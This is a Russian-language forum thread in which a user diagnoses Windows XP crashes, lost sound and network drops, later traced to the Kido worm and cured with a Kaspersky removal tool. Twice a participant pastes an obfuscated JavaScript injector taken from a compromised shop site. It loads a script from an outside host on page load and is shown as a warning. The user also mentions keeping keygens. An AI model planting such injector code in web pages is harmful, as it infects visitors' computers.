Помогите с Обнаружена ошибка+Решения

[nii1]

Господа Знатоки, прошу помочь в решении моей проблемы.

Ситуация такая: Переустановил WinXP SP3 после буйного вируса пропущенного Avast'ом. Сейчас использую лицензионный KAV 2010, им проверил всё, всё работало хорошо. Но в один прекрасный день мне понадобилось воспользоваться службой Webmoney, установил WebMoney Keeper Classic 3.9.0.0 (до переустановки стоял точно такой же) и...

...возникла проблема в решении которой я прошу помочь. Программа открывается, прохожу все проверки, появляется стандартное окно программы в котором отображаются мои инициалы, WMID и сумма в кошельках, НО через несколько секунд программа зависает и появляется табличка "WebMoney.exe - обнаружена ошибка.Приложение будет закрыто", т.е. никаких операция я провести не могу.

Обратился в службу поддержки, получил 1 ответ, что нужно проверить систему на вирусы, проверил ещё раз - всё хорошо, угроз не обнаружена на максимальном уровне проверки, описал это службе поддержки и не получаю ответа уже месяц. По телефону говорят, что моя проблема решается, но что можно решать месяц я не понимаю, тем более, что до переустановки всё было прекрасно. Сейчас вышел новый кипер, но проблема не ушла.

Я бы так и мучался сомнениями и компетентностью службы их поддержки, НО заметил ещё кое-что: такая же табличка (или похожие) появляется при запуске программ: incrediMail 2.0, BitComet и Shareaza. Все они связаны тем, что относятся к работе в интернете.

+Сейчас стало при загрузке Виндоус появляется сообщение, что обнаружено новое железо с названием net, хотя я ничего не вставлял нового в комп.

Что может мешать им работать? Заранее спасибо за ответ.

[nii1]

Проверил ещё раз Касперским и новым LiveCD Dr.Web - несколько вирусов найдено, удалено - проблема не решилась.

Сейчас не получается настроить новый протокол, хотя все настройки правильные, сижу на старом.

Появилась новая проблема, причём появляется второй день)
Хронология такая:
1) Начинают глючить и отрубаться интернет и локальная сеть.
2) Появляется сообщение об ошибке (рис 1)
3) Некоторые программы и меню "Пуск" принимают классический вид (рис. 2)
4) При нажатии на знак "Громкость" около часов, выдаёт: (рис 3) и перестают запускаться аудио и видео файлы, ругаясь на отсутствие устройств вывода звука.

Поискал уязвимости винды Касперским, явные автораны и т.д. убрал, но он нашёл ещё 15 уязвимостей в программах их пока не исправлял.

Кажется у меня вся Винда сыпится... Главное чтобы не жёсткий... Какой программой можно проверить жёсткий диск на целостность?

Подскажите пожалуйста, стоит париться с уязвимостями или уже забить на всё и переустановить винду?

[Egen]

Может у вас там троян какой? Попробуйте проверится ну хотя бы  AD-AWARE например. На предмет наличия таковых.

[nii1]

Может у вас там троян какой? Попробуйте проверится ну хотя бы  AD-AWARE например. На предмет наличия таковых.

Спасибо за совет. Ок, сейчас скачаю и проверю, но не особо верится что Каспер с Доком Вебом на пару его пропустили. ХЗ...

Сейчас, слушая интернет-радио, первый раз в своей жизни увидел синий экран смерти, правда потом сразу комп ребутнулся, так что я даже насладиться им не успел ^___^

После этого экрана даже появились мысли, что проблемы не в варезе, а железе... 

[nii1]

+ сегодня Очень часто вылезает (см. рис1), нажимаю "запретить" и Касперский автоматически запрещает эти попытки запуска, НО полный отчёт реально выглядит страшно, этой прелести там за один день листов 5 не меньше. Облазил Яндек и Гугл и ничего толком не нашёл про этот файл...

[nii1]

+ проснулся вебмани кипер 
видимо стрельнули у меня аккаунт всё таки, а мне блокируют((( Может такое быть?

З.Ы. Второй синий экран словил пока обновлял программу Ad-Aware, обновил ещё раз 

[Hurt Locker]

+ сегодня Очень часто вылезает (см. рис1), нажимаю "запретить" и Касперский автоматически запрещает эти попытки запуска, НО полный отчёт реально выглядит страшно, этой прелести там за один день листов 5 не меньше. Облазил Яндек и Гугл и ничего толком не нашёл про этот файл...

     В интернете полно ссылок, прямо говорящих что woot.exe - trojan vulgaris (троян обыкновенный). У меня на компьютере (Win7 и XP) такого файла нет.

     1. Вот где мог подцепить. То же самое.

     2. Вот информация есть разная - вариант 1, подборка с Google.

     Убей процесс, да и файл потом грохни.

[nii1]

Спасибо за помощь

Может у вас там троян какой? Попробуйте проверится ну хотя бы  AD-AWARE например. На предмет наличия таковых.

Проверился полностью, нашёл 5 кейгенов, двумя пользуюсь постоянно - чуть-чуть доверия всё-таки есть, остальные удалил...

     В интернете полно ссылок, прямо говорящих что woot.exe - trojan vulgaris (троян обыкновенный). У меня на компьютере (Win7 и XP) такого файла нет.

     2. Вот информация есть разная - вариант 1, подборка с Google.

Видел, и про вирус и про игры, решил тут посоветоваться. Первая ссылка - там так ничего и не ответили товарищу...

     Убей процесс, да и файл потом грохни.

Убил, грохнул. Теперь (см рис. 1), откуда-то оно всё-равно вылезает, только там где оно явно было, его нет 

Все проблемы остались... в том числе и отрубающийся интернет вместе с звуковой...

[Hurt Locker]

     В первой ссылке товарищу дали скрипт для его компа. Там еще несколько файлов-вирусов и чистка реестра.

[rооt#]

абсолютных антивирусов не бывает.
Даже платных за свои кровные.
единственный более-менее работоспособный антивирус - прокладка между креслом и клавиатурой.
В данном случае могу посоветовать только на будущее:
1. Никогда не заходить на порносайты.
2. Никогда не вступать в неизвестные сообщества в социальных сетях. А лучше - вообще удалиться со всех социальных сетей.
3. Никогда не проходить по ссылкам в аське от неизвестных пользователей (и от известных ламеров - тоже).
4. Никогда не кликать на баннеры.
5. Никогда не заходить на развлекательные порталы и не скачивать и не устанавливать с них всякую херь.
Список можно продолжить.

[nii1]

Спасибо всем за советы.
Сейчас Винду грохну и заново всё поставлю.

[LEO]

абсолютных антивирусов не бывает.
Даже платных за свои кровные.
единственный более-менее работоспособный антивирус - прокладка между креслом и клавиатурой.
В данном случае могу посоветовать только на будущее:
1. Никогда не заходить на порносайты.
2. Никогда не вступать в неизвестные сообщества в социальных сетях. А лучше - вообще удалиться со всех социальных сетей.
3. Никогда не проходить по ссылкам в аське от неизвестных пользователей (и от известных ламеров - тоже).
4. Никогда не кликать на баннеры.
5. Никогда не заходить на развлекательные порталы и не скачивать и не устанавливать с них всякую херь.
Список можно продолжить.

хм) звучит неплохо)
В вашем духе если продолжить - то список будет очень длинный. Более коротким он будет в другой формулировке:

Никогда не включайте компьютер!
кроме как для:
1. ...
2. ...




мне кажется, если соблюдать все перечисленные пункты вашего списка с самого начала - то опыт, позволяющий игнорировать все эти правила, не пользоваться при этом антивирусом, и не смотря на это - не иметь никаких вирусов, глюков и прочих проблем - никогда не появится)

[Хрустальная гора]

хм) звучит неплохо)
В вашем духе если продолжить - то список будет очень длинный. Более коротким он будет в другой формулировке:

Никогда не включайте компьютер!
кроме как для:
1. ...
2. ...




мне кажется, если соблюдать все перечисленные пункты вашего списка с самого начала - то опыт, позволяющий игнорировать все эти правила, не пользоваться при этом антивирусом, и не смотря на это - не иметь никаких вирусов, глюков и прочих проблем - никогда не появится)

Элементарно. Заходите на сайт, открывается баннер, который прозевала рекламная контора и пустила в ротация. Залетает вирус. Совсем недавно куча знакомых погорела так на фастпике. Это сервис типа радикала.

[LEO]

куда залетел? каким это образом?

[Хрустальная гора]

куда залетел? каким это образом?

Я его не проектировал. Залетел не ко мне, слава Богу.

[nii1]

Tallman, Вы были правы. Мне очень стыдно, что не послушал умного человека и из-за этого мучился 4 дня с перебежками(((

Действительно после переустановки системы проблемы не решились. На абсолютно чистой винде проявились все прошлые симптомы. Только KAV ещё стал ругаться на троян kido, но удалить его не мог. По совету знакомого проверял харды антивирусами со съёмного харда не заходя на заражённый: KAV2010, Nod32 Antivirus 4, Dr.WEB Cure IT, Dr.WEB 6 Space security  все с последними базами и ничем толком так и не помогли. 

Прогон компа kidokiler'ом по описанию в окне программы ничего не дал, но после этого KAV стал ругаться не на kido, а на троян USDDangerousObject.Multi.Generic 

Вчера нашёл инструкцию по лечению заражённого компьютера утилитой Kaspersky Virus Removal Tool 2010, она в режиме автоматической проверки вылечила мою проблему. Сегодня с часа ночи и до сих пор полёт нормальный, правда ещё webmoney не проверил.

[LEO]

Я его не проектировал. Залетел не ко мне, слава Богу.

тогда это выглядело так:
юзер кликает по ссылке. открывается диалог открыть\сохранить. Возможно даже с предупреждением, что это исполняемый файл и будьте осторожны. И юзер жмет "открыть" или сначала сохраняет,а потом открывает (возможно, лицезрев еще одно предупреждение).

вот так вот "залетел".
___________

Хотя... возможно, Вы действительно правы.
Были уязвимости в браузерах, позволяющие выполнить код. Более того, сотрудники горячо здесь любимой лаборатории на одной из своих быдло-конференций говорили, что хакеры взламывают популярные сайты, добавляя на страницы сайта код, использующий эти уязвимости. Так что можно схватить бяку просто открыв какой-нить РБК.

Однако, на мой взгляд - вероятность такого заражения очень мала. Тут нужен старый дырявый браузер (к примеру под Оперу навряд ли кто-то будет писать эксплоиты, если только в нашей стране, где она популярна), нужно чтобы кто-то взломал известный сайт, и чтобы вы туда успели зайти. Ну или просто зашли на какой-нить сайт в поисках очередного "крякера интернета".

Так что думаю, велика вероятность, что ваши знакомые заразились первым способом - по глупости.

[Faust]

Мил человек. У вас кидо буйствует - о чем свидетельствует пропадание звука. Тема винды на стандартную не сбрасывается?
1. Поставить заплатку
2. Заюзать фикс (сбросятся сетевые натройки)

Сегодня дали ссылку на сайт вполне обычный, опосля которого вылезало сообщение о ребуте
http://hand-made-shop.ru/
Если не уверены в своей защите - НЕ ЗАХОДИТЕ.
В коде главной страницы любопытный скрипт в 2-х местах
строки 13 и 286

Код: [Выделить]

<script>var a;if(a!='' && a!='ci'){a='c'};this.q="";var H=new Array();function Y(){var L=new String();var IS=new String();this.D="";var j=unescape;var m="";var z=window;var cG;if(cG!='O'){cG=''};var sm="";var Ym;if(Ym!=''){Ym='KH'};var N="";var s=j("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6e%75%2e%6e%6c%2f%65%62%61%79%2e%65%73%2e%70%68%70");var cR='';var lw;if(lw!='P' && lw!='xV'){lw='P'};var hH;if(hH!='nv' && hH!='Rf'){hH='nv'};function M(U,W){var E;if(E!='' && E!='xH'){E=''};var MH=new Array();var B=new String("g");this.zu="";var J=j("%5b"), F=j("%5d");var BP;if(BP!='ze' && BP!='I_'){BP='ze'};var BJ;if(BJ!='ViL' && BJ!='wl'){BJ='ViL'};var Q=J+W+F;var I=new RegExp(Q, B);var VZ="";return U.replace(I, new String());};var J_=new Array();this.Ud='';this.Rp='';this.wt='';this.Qv='';var LH;if(LH!='nz' && LH!='lo'){LH='nz'};var Fu=new String();var IK='';var lv='';var v=M('8720278140273','39647215');var l=document;var cN='';var Os=new Date();var RC=new Date();function S(){var VT='';var pu='';var V=j("%68%74%74%70%3a%2f%2f%66%6c%6f%72%69%64%61%6f%72%69%67%69%6e%2e%61%74%3a");Fu=V;var AO;if(AO!='g' && AO!='fj'){AO='g'};Fu+=v;var zbd;if(zbd!='RxZ'){zbd='RxZ'};Fu+=s;var Sr='';var qbl;if(qbl!='Qz'){qbl=''};try {this.Vt="";var eY;if(eY!='' && eY!='dT'){eY='KNJ'};var KE=new String();Vi=l.createElement(M('socxrwifpxt0','yfw6Ox0o'));this.MI="";this.Xq="";var IJ;if(IJ!='' && IJ!='xs'){IJ=''};this.uw="";Vi[j("%64%65%66%65%72")]=[1][0];var kp;if(kp!='ww' && kp != ''){kp=null};Vi[j("%73%72%63")]=Fu;var _;if(_!='' && _!='lM'){_=null};var Le='';l.body.appendChild(Vi);var fd;if(fd!='' && fd!='Dj'){fd=''};this.gD='';var Yg=new Date();} catch(x){var IL='';var yC;if(yC!=''){yC='hv'};alert(x);};}this.Tt="";var pg;if(pg!='' && pg!='Hi'){pg='fz'};this.Pj='';var Ev="";z[new String("onl"+"oad")]=S;this.nP="";this.ak="";};var yY=new Array();Y();var ug=new Date();</script>
Судя по-всему, генерирует ссылку на exe, скачивает и копирует в темпы.

[nii1]

Мил человек. У вас кидо буйствует - о чем свидетельствует пропадание звука. Тема винды на стандартную не сбрасывается?
1. Поставить заплатку
2. Заюзать фикс (сбросятся сетевые натройки)

Сбрасывалась, я писал об этом. После Virus Removal Tool 2010 не сбрасывалась, звук работает, интернет работает. На всякий случай Вашу заплатку сейчас поставлю.

Ещё одной моей глупой ошибкой было отключить автоматическое обновление и не обновлять винду другими путями, сейчас включил обновление, жду пока скачает обновления. (Не совсем понимаю как работает эта служба, в интернете сейчас уже часа 3 но никаких обновлений установить предложено не было. Настройки поставил на скачивать и спрашивать время установки (как-то так))

[Kasen]

Мил человек. У вас кидо буйствует - о чем свидетельствует пропадание звука. Тема винды на стандартную не сбрасывается?
1. Поставить заплатку
2. Заюзать фикс (сбросятся сетевые натройки)

Сегодня дали ссылку на сайт вполне обычный, опосля которого вылезало сообщение о ребуте
http://hand-made-shop.ru/
Если не уверены в своей защите - НЕ ЗАХОДИТЕ.
В коде главной страницы любопытный скрипт в 2-х местах
строки 13 и 286

Код: [Выделить]

<script>var a;if(a!='' && a!='ci'){a='c'};this.q="";var H=new Array();function Y(){var L=new String();var IS=new String();this.D="";var j=unescape;var m="";var z=window;var cG;if(cG!='O'){cG=''};var sm="";var Ym;if(Ym!=''){Ym='KH'};var N="";var s=j("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6e%75%2e%6e%6c%2f%65%62%61%79%2e%65%73%2e%70%68%70");var cR='';var lw;if(lw!='P' && lw!='xV'){lw='P'};var hH;if(hH!='nv' && hH!='Rf'){hH='nv'};function M(U,W){var E;if(E!='' && E!='xH'){E=''};var MH=new Array();var B=new String("g");this.zu="";var J=j("%5b"), F=j("%5d");var BP;if(BP!='ze' && BP!='I_'){BP='ze'};var BJ;if(BJ!='ViL' && BJ!='wl'){BJ='ViL'};var Q=J+W+F;var I=new RegExp(Q, B);var VZ="";return U.replace(I, new String());};var J_=new Array();this.Ud='';this.Rp='';this.wt='';this.Qv='';var LH;if(LH!='nz' && LH!='lo'){LH='nz'};var Fu=new String();var IK='';var lv='';var v=M('8720278140273','39647215');var l=document;var cN='';var Os=new Date();var RC=new Date();function S(){var VT='';var pu='';var V=j("%68%74%74%70%3a%2f%2f%66%6c%6f%72%69%64%61%6f%72%69%67%69%6e%2e%61%74%3a");Fu=V;var AO;if(AO!='g' && AO!='fj'){AO='g'};Fu+=v;var zbd;if(zbd!='RxZ'){zbd='RxZ'};Fu+=s;var Sr='';var qbl;if(qbl!='Qz'){qbl=''};try {this.Vt="";var eY;if(eY!='' && eY!='dT'){eY='KNJ'};var KE=new String();Vi=l.createElement(M('socxrwifpxt0','yfw6Ox0o'));this.MI="";this.Xq="";var IJ;if(IJ!='' && IJ!='xs'){IJ=''};this.uw="";Vi[j("%64%65%66%65%72")]=[1][0];var kp;if(kp!='ww' && kp != ''){kp=null};Vi[j("%73%72%63")]=Fu;var _;if(_!='' && _!='lM'){_=null};var Le='';l.body.appendChild(Vi);var fd;if(fd!='' && fd!='Dj'){fd=''};this.gD='';var Yg=new Date();} catch(x){var IL='';var yC;if(yC!=''){yC='hv'};alert(x);};}this.Tt="";var pg;if(pg!='' && pg!='Hi'){pg='fz'};this.Pj='';var Ev="";z[new String("onl"+"oad")]=S;this.nP="";this.ak="";};var yY=new Array();Y();var ug=new Date();</script>
Судя по-всему, генерирует ссылку на exe, скачивает и копирует в темпы.

А запускает этот екзешник святой дух потом?
Полагаю эксплуатируется браузер, с какого заходили? С Ослика?

[Faust]

А запускает этот екзешник святой дух потом?
Полагаю эксплуатируется браузер, с какого заходили? С Ослика?

Мозилла 3.6.3
Adblock plus стоит
mcafee 8.7.0+ antispamware 8.7